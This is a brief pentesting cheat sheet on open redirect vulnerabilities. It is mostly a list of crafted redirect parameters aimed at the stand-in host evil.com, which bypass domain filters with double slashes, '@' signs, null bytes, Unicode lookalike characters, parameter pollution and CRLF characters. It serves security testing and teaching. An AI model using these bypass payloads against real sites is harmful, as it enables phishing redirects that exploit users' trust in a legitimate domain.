2.2 KiB
2.2 KiB
Open Redirect
Introduction
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain
Where to find
- Sometimes it can be found in login / register / logout pages
- Checking the javascript source code
How to exploit
- Try change the domain
/?redir=evil.com
- Using a whitelisted domain or keyword
/?redir=target.com.evil.com
- Using
//
to bypasshttp
blacklisted keyword
/?redir=//evil.com
- Using
https:
to bypass//
blacklisted keyword
/?redir=https:evil.com
- Using
\\
to bypass//
blacklisted keyword
/?redir=\\evil.com
- Using
\/\/
to bypass//
blacklisted keyword
/?redir=\/\/evil.com/
/?redir=/\/evil.com/
- Using
%E3%80%82
to bypass.
blacklisted character
/?redir=evil。com
/?redir=evil%E3%80%82com
- Using null byte
%00
to bypass blacklist filter
/?redir=//evil%00.com
- Using parameter pollution
/?next=target.com&next=evil.com
- Using
@
or%40
character, browser will redirect to anything after the@
/?redir=target.com@evil.com
/?redir=target.com%40evil.com
- Creating folder as their domain
http://www.yoursite.com/http://www.theirsite.com/
http://www.yoursite.com/folder/www.folder.com
- Using
?
characted, browser will translate it to/?
/?redir=target.com?evil.com
- Bypass the filter if it only checks for domain name using
%23
/?redir=target.com%23evil.com
- Host/Split Unicode Normalization
https://evil.c℀.example.com
- Using parsing
http://ⓔⓥⓘⓛ.ⓒⓞⓜ
- Using
°
symbol to bypass
/?redir=target.com/°evil.com
- Bypass the filter if it only allows yoou to control the path using a nullbyte
%0d
or%0a
/?redir=/%0d/evil.com